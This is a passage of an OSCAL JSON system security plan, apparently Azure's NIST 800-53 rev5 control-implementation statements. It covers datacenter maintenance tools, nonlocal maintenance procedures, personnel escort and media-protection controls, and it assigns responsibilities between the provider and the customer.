Access to the lock box or storage room is controlled in DCAT to prohibit unauthorized access to the maintenance tools."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"5194225d-51c8-441b-8dbc-85d0341d0cb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.3_smt.c","by-components":[{"uuid":"9bb3d86b-bc1d-496e-976e-aa4461a37aad","export":{"provided":[{"uuid":"0a41c9f8-5c69-40f0-93c5-19e200304d86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-020"}],"description":"Maintenance tools are datacenter-specific; they are not removed and are retained within the facility. Each facility contains a restricted physical lock box or storage room that stores maintenance tools, such as Fluke ether scopes, Fluke fiber channel testers, Ethernet toners, etc. 
Access to the lock box or storage room is controlled in DCAT to prohibit unauthorized access to the maintenance tools."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"9954c60c-d7c3-46d3-abc9-19adaad8f2f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-021"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-3.3_smt.d","by-components":[{"uuid":"5d2d9aa0-e436-40fe-96a0-43dabdddad6b","export":{"provided":[{"uuid":"3d0ac092-0bf0-48b6-94d8-48dfaa7504dd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-021"}],"description":"Maintenance tools are datacenter-specific; they are not removed and are retained within the facility. Each facility contains a restricted physical lock box or storage room that stores maintenance tools, such as Fluke ether scopes, Fluke fiber channel testers, Ethernet toners, etc. 
Access to the lock box or storage room is controlled in DCAT to prohibit unauthorized access to the maintenance tools."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"857e461e-cde5-42ea-8213-17b1f4554429","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-4","statements":[{"uuid":"d5b0252a-d070-4c28-9bb3-eb3483b51dc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.a","by-components":[{"uuid":"6d818d38-f1d1-469e-8735-d1147b0767a2","export":{"provided":[{"uuid":"49504f70-603d-427b-a41a-f0a7a68e65eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-022"}],"description":"All access, including access for nonlocal maintenance, is approved per procedure via OneIdentity and JIT, and changes are approved through those same procedures. Azure adheres to the Microsoft Security Development Lifecycle (SDL) process, which requires all development teams to utilize standard approved tools and their associated security checks. Azure authorizes, monitors, and controls nonlocal maintenance and diagnostic activities within the Azure managed network. 
All nonlocal network maintenance is performed via the change management process, which includes the approval of time-bound JIT requests specific to service team groups and the monitoring of actions taken at the asset and service level through the audit logging and monitoring pipeline."}],"responsibilities":[{"uuid":"cf4bf317-d7ee-46bd-ab82-7a466558b7ce","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-022"}],"description":"The customer is responsible for approving and monitoring non-local maintenance and diagnostic activities on customer-deployed operating systems.","provided-uuid":"49504f70-603d-427b-a41a-f0a7a68e65eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"90f4ccc0-dfa2-4fe2-ba7d-7cd5cf5e92ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.b","by-components":[{"uuid":"eb4918dd-47e9-4245-b7bc-5a3bda75d92b","export":{"provided":[{"uuid":"d75e37e9-15ff-45ea-8112-651924bf629c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-023"}],"description":"Nonlocal maintenance may be performed by authorized Azure personnel. 
Use of nonlocal maintenance and diagnostic tools is allowed within the Azure environment as long as the use is consistent with the configuration management processes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8dfbeb6a-238e-46cd-bd62-ce7375197fa9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-023"}],"description":"The customer is responsible for using maintenance and diagnostic tools that are consistent with organizational policy and documented in the security plan when performing non-local maintenance on customer-deployed operating systems.","provided-uuid":"d75e37e9-15ff-45ea-8112-651924bf629c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"65386863-79c4-4662-98b0-9061fe48befe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.c","by-components":[{"uuid":"1ae56da9-a648-48e6-858e-cdd1144ae90d","export":{"provided":[{"uuid":"1cfba89d-3879-43d1-a49b-00f35ac3ea65","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-024"}],"description":"Azure enforces strong identification and authentication controls in conducting nonlocal maintenance and diagnostic activities. 
Authentication is handled by AD using Thales smart cards._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9096670f-f9b1-4fac-a06d-2770696fdf05","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-024"}],"description":"The customer is responsible for using strong authenticators when establishing non-local maintenance and diagnostic sessions on customer-deployed operating systems.","provided-uuid":"1cfba89d-3879-43d1-a49b-00f35ac3ea65"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d0205af3-2b64-43b1-ac51-42a01b80f59c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.d","by-components":[{"uuid":"c79f9cb2-9ec3-4656-92eb-7684476c7624","export":{"provided":[{"uuid":"277d711a-c33c-45c6-ac07-99fc5dc446e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-025"}],"description":"Auditing of maintenance and diagnostics within the Azure environment is performed via Azure DevOps and as part of the JIT elevation process. All nonlocal network maintenance must be documented in work tickets. 
Maintenance and diagnostic activities are logged in relevant logging and monitoring tool logs._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5b2fad35-1b5b-4230-b935-76e67ea634b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-025"}],"description":"The customer is responsible for maintaining records for non-local maintenance and diagnostic activities on customer-deployed operating systems.","provided-uuid":"277d711a-c33c-45c6-ac07-99fc5dc446e7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"642b051a-a970-4f75-8546-32e1a9f1da70","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4_smt.e","by-components":[{"uuid":"fc950a01-5ab9-47a4-89b2-8d41c7a785be","export":{"provided":[{"uuid":"7372c48e-6f59-4625-83e2-89c9edfbbe71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-026"}],"description":"Nonlocal sessions are terminated after the JIT elevation period expires. 
Nonlocal maintenance is performed via RDGWs, SSH, and SSL VPNs which enforce a network disconnect and allow users to terminate connections at the completion of the work._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0fcd83c0-77ac-44d5-b15c-114427d6b77f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-026"}],"description":"The customer is responsible for terminating session and network connections when non-local maintenance is completed on customer-deployed operating systems.","provided-uuid":"7372c48e-6f59-4625-83e2-89c9edfbbe71"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"78a7914d-e2dc-42b0-8606-1f2795214217","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-4.3","statements":[{"uuid":"9ce1a751-8b9e-4a65-8196-6960ad20d87c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4.3_smt.a","by-components":[{"uuid":"c791ca2b-827b-417f-8d7c-1f6089c7ff5a","export":{"provided":[{"uuid":"b5c98cf1-5937-45f9-8a44-232ecc9a536b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-027"}],"description":"Remote maintenance and diagnostic services are performed by first logging in via RDP to a Jumpbox, Debug Server, or Network Hop Box from a Secure Administrative Workstation (SAW) machine on Microsoft CorpNet, and then initiating a second RDP session from the interim device to the destination target 
asset. No direct connection is possible from workstations to the destination asset. TLS 1.2 is used to protect RDP connections._x000D_ _x000D_ Azure requires strong identification and authentication for nonlocal maintenance and diagnostic sessions. Azure uses combinations of elevated access accounts and smart cards to access assets. When nonlocal maintenance is completed via RDGW, SSH, or SSL VPN, the session is terminated by the user or is disconnected by the information system after fifteen (15) minutes of inactivity._x000D_ _x000D_ All nonlocal network maintenance and diagnostic sessions are managed through the configuration management process. Changes must be approved and documented in work tickets. Before changes are automatically deployed in the production environment, a required quality control step calls for peer review of the proposed change, and a safe deployment process is followed during deployment. After changes are implemented, a quality control process reviews success criteria against logged work tickets from the past month._x000D_ _x000D_"}],"responsibilities":[{"uuid":"63f0cb17-2897-4e7d-86a5-57b2075014c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-027"}],"description":"The customer is responsible for performing all non-local maintenance of customer-deployed operating systems from an information system that has comparable security.","provided-uuid":"b5c98cf1-5937-45f9-8a44-232ecc9a536b"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dd40561e-5a13-4f25-95f8-4bb54abfd3cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-4.3_smt.b","by-components":[{"uuid":"83d267d1-ca9e-48ea-a9dd-1f41efca511b","export":{"provided":[{"uuid":"6f44bf6f-6aef-4871-91ec-d393708feacf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-028"}],"description":"Physical components within the Azure environment are not removed from the Azure datacenter for nonlocal maintenance. Digital media does not leave the secure physical Azure boundary of the colocation unless it is being taken for physical destruction by shredding onsite._x000D_ _x000D_"}]},"description":"See inheritance 
statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"3b929290-14e2-4fa1-9893-b3867c996485","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-5","statements":[{"uuid":"a831fd68-ad90-4b02-83d9-18c2da61f3c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-029"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-5_smt.a","by-components":[{"uuid":"61477c1a-23bc-41ed-995f-45626f1b0659","export":{"provided":[{"uuid":"93dff724-b9ef-4c52-899c-7cd133e26f1d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-029"}],"description":"Maintenance personnel authorization at Azure datacenters is managed through the DCAT system. All FTEs and vendors' physical access to the datacenters is managed through DCAT. Logical access (any nonlocal maintenance) is managed through the CM process and access is documented, provisioned, and approved._x000D_ _x000D_ All maintenance work requires an associated work ticket. In order to physically access the datacenter to perform maintenance, the person must be approved by the Datacenter Management (DCM) team via a DCAT request. When arriving at the datacenter, a person's identity is matched against their approved DCAT request. The DCAT tool manages the areas that maintenance personnel can access. The principle of least privilege is used in granting access. Azure datacenters have resident maintenance teams called Site Services and Critical Environment (CE) teams. 
On a quarterly basis, the datacenter management team and physical security teams perform audits of the DCAT access list to keep the access list of maintenance personnel current. Personnel terminations or transfers are reflected immediately through a manual update of the access list._x000D_ _x000D_"}],"responsibilities":[{"uuid":"6f7bbe53-e3ef-42f5-a94f-231bf9cf6152","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-029"}],"description":"The customer is responsible for authorizing remote maintenance personnel and maintaining a list of authorized remote maintenance organizations/personnel.","provided-uuid":"93dff724-b9ef-4c52-899c-7cd133e26f1d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bb3cdf96-d817-43ff-bae5-fdc07fdb1618","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-030"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-5_smt.b","by-components":[{"uuid":"a5c8c519-cd32-46ff-ba3d-fe688365b91c","export":{"provided":[{"uuid":"0e8ce9d0-041f-4305-af18-e429cbd9ec47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-030"}],"description":"Maintenance personnel have their physical access authorizations managed in the DCAT system. 
Site Services and CE teams have certification requirements or equivalent tenure and training that ensure their team members are knowledgeable in supporting their respective datacenter environments._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e548170d-2477-4e58-87a0-03f09d586633","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-030"}],"description":"The customer is responsible for managing maintenance personnel, ensuring that non-escorted personnel performing maintenance on customer-deployed operating systems have the required access authorizations.","provided-uuid":"0e8ce9d0-041f-4305-af18-e429cbd9ec47"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"88caa873-f607-41e6-be0a-2e2197847e50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-5_smt.c","by-components":[{"uuid":"5104e372-d737-4a4f-b5c1-0a87c020e580","export":{"provided":[{"uuid":"fdec1fdf-0293-4b28-bc69-652918f48c99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-031"}],"description":"Maintenance personnel with the appropriate technical competence and access authorizations escort any vendor that is required to perform maintenance on the system._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c69f90a2-fd24-41fd-8160-378446d06d64","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-031"}],"description":"The customer is responsible for managing maintenance personnel and designating 
organizational personnel with required access authorizations and technical competence to supervise the maintenance activities of personnel who do not possess the required access authorizations.","provided-uuid":"fdec1fdf-0293-4b28-bc69-652918f48c99"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2db8bbb9-cee3-4cb4-9290-e15603527fca","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-5.1","statements":[{"uuid":"662340b9-8c05-43ec-9e10-54733fa3d9de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-033"}],"statement-id":"ma-5.1_smt.a","by-components":[{"uuid":"e7966af1-01c3-4c4a-83de-116b30b67079","export":{"provided":[{"uuid":"7116ee53-bc10-44e8-b9a1-716e004c997e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-032"}],"description":"All visitors to datacenters who must gain physical access to perform maintenance must be approved by the Datacenter Management (DCM) team for access through a DCAT request. When arriving at the datacenter, a person's identity is matched against their approved DCAT request. 
Additionally, visitors who do not have appropriate access approvals, such as maintenance vendors, are escorted by someone who possesses the technical competence and appropriate clearances and access to supervise the work they are performing."},{"uuid":"77019e3c-fbc5-49e1-8c0d-26be4b050b95","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-033"}],"description":"All visitors to datacenters who must gain physical access to perform maintenance must be approved by the Datacenter Management (DCM) team for access through a DCAT request. When arriving at the datacenter, a person's identity is matched against their approved DCAT request. Additionally, visitors who do not have appropriate access approvals, such as maintenance vendors, are escorted by someone who possesses the technical competence and appropriate clearances and access to supervise the work they are performing. Visitors without access approvals or clearances are not permitted logical access to system assets."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"8b8e36d3-c7f3-4d7c-9dde-ddfa7d237633","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-034"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ma-5.1_smt.b","by-components":[{"uuid":"c615c02d-f765-4332-9e66-03d752667e3b","export":{"provided":[{"uuid":"ff7cf449-3eb9-4161-9970-2010c356ffd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-034"}],"description":"If a data-bearing device (DBD) cannot be sanitized prior to necessary maintenance, it is destroyed to ensure the confidentiality of customer data."}]},"description":"See inheritance 
statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"ead5ce28-dfd1-4dce-abee-d0cfcf62a325","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-6","statements":[{"uuid":"32ab6404-7515-43da-8b4d-a4f86884e079","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-035"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ma-6_smt","by-components":[{"uuid":"675c1909-8972-4527-938b-5de9de83d8f6","export":{"provided":[{"uuid":"1705cb99-fed8-46d1-a875-cd10ea23dbe9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-035"}],"description":"Azure datacenters maintain resident maintenance personnel as part of the Critical Environment (CE) team to support critical datacenter infrastructure systems as well as personnel as part of the Site Services team to support datacenter operations. The CE and Site Services teams have identified critical security and technology system components which they maintain spares for onsite. Critical systems are designed in N+1 configurations and services are designed to be resilient. This allows the datacenter management team to meet recovery goals in the event of a service interruption or contingency plan situation. Critical information system services are provisioned from more than one datacenter to prevent an interruption in service due to an incident at one of the datacenters. 
Services are responsible for deploying to multiple datacenters to provide for redundancy and resiliency."}],"responsibilities":[{"uuid":"644b7fa1-8045-446a-aa8d-e512f499da2a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-035"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for timely maintenance support of customer-deployed operating systems.","provided-uuid":"1705cb99-fed8-46d1-a875-cd10ea23dbe9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"933be29e-9e1f-4856-b7bf-05596591ea65","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-2","statements":[{"uuid":"6ff0b085-55c3-4ac2-9153-f7dfc13325b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-2_smt","by-components":[{"uuid":"9990c27b-2a58-4423-ad06-c1a45c4fd729","export":{"provided":[{"uuid":"56b0b14c-da58-4109-90ec-d9399cdf6940","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-006"}],"description":"Azure has implemented media access through the implementation of the Microsoft Security Program Policy (MSPP). Logical access to digital media is controlled via Active Directory Group Policy Objects (AD GPOs) and security groups in OneIdentity. Physical access to all media is restricted by the datacenter access process. 
Access is restricted to individuals who have a legitimate business purpose for accessing the data. The Asset Protection Standard defines the safeguards required to protect the confidentiality, integrity, and availability of information assets within Azure datacenters. Azure considers digital media for this control to be the server and network device assets secured at Azure datacenters. Non-digital media is not used for storage of Azure information._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"6720563a-00b9-49ef-b4c2-6c46f1928320","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-3","statements":[{"uuid":"4c20db06-8c70-4d9a-9f15-dc46a5da88d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-3_smt.a","by-components":[{"uuid":"830b29fe-6592-4a63-9ce4-de107d86b376","export":{"provided":[{"uuid":"314b43dd-fc62-4bac-a388-d553b1cb887f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-007"}],"description":"Assets within Azure datacenters are classified with a High, Moderate, or Low Business Impact (HBI, MBI, LBI) designation, which requires different levels of security and handling precautions. Asset owners are required to classify their assets. HBI assets are secured in a rack with a small, red placard labeled HBI on the door of the rack. 
_x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"74e0ef05-97a3-473b-9df5-99575e2a0fff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-3_smt.b","by-components":[{"uuid":"81ae8b2e-aef2-46d6-8710-fc798315ade3","export":{"provided":[{"uuid":"8c3bbac4-80dc-4c37-aa12-6cb191d483b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-008"}],"description":"Asset owners are required to assign their assets an asset classification and no assets are exempt from this requirement. In the Azure datacenter environment, assets refer to servers, network devices, and magnetic tapes. Non-digital media is not used in the datacenters._x000D_ _x000D_ Azure implements maintenance tools control by creating an access level within the Datacenter Access Tool (DCAT). Each facility contains a restricted physical lock box or access-controlled room for the storage of specialized maintenance tools, such as fluke ether scopes, fluke fiber channel testers, Ethernet toners, and USBs. Access is controlled to the lock box or storage room using the DCAT tool to prohibit unauthorized access to the maintenance tools. This ensures that only personnel with approved access can access the tools._x000D_ _x000D_ Third-party maintenance personnel may provide their own calibrated tools or assets where necessary. The same access controls in DCAT that limit access to the on-site tooling are also in place for all work areas where Critical Environment (CE) assets are present. Azure limits where any personnel can go and what doors they can open. 
To access the work site, they must follow CE procedural requirements._x000D_ _x000D_ The Site Services team performs routine inventory checks to verify the status of all tools. Access to lock box or maintenance storage room is tracked in the access badge reader logs, which are available in the event of an investigation. On a quarterly basis, the datacenter management team and physical security teams perform audits of the DCAT access list to keep the access list of maintenance personnel current. Personnel terminations or transfers are reflected immediately through a manual update of the access list._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"82c9b3be-d318-44a1-a245-25767742bc48","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-4","statements":[{"uuid":"4cc7acd0-a363-4ed8-ad66-de5a993720af","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-4_smt.a","by-components":[{"uuid":"7b2b428a-b8fc-45ef-8c7f-0a316e998660","export":{"provided":[{"uuid":"5622098a-de2c-481e-a9e2-a2c9eb4804ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-009"}],"description":"Azure digital media assets are physically and securely stored within Azure datacenters, colocation rooms, or Global Cloud Coordination Centers (GC3s). Azure locations have multiple layers of physical access controls and video surveillance in place to provide secure storage. Digital media includes servers, network devices, and magnetic tapes. 
